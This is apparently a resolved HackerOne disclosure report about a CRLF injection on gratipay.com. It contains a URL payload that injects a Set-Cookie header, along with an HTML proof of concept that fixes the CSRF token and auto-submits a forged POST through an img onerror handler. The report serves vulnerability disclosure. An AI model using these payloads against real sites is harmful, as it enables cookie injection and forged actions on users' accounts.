[gratipay.com] CRLF Injection
High
Vulnerability Details
### CRLF Injection
(Chrome, Internet Explorer)
```
http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
```
HTTP Response:
```
Location: https://gratipay.com/\r
Set-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;\r\n
```
### CSRF Protection Bypass via CRLF Injection
PoC:
```html
<form id="csrf" action="https://gratipay.com/~fickov/statement.json" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="content" value="CSRF_TEST" />
<input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;" onerror="csrf.submit()">
```
This vulnerability has been fixed.
Actions
View on HackerOneReport Stats
- Report ID: 79552
- State: Closed
- Substate: resolved
- Upvotes: 5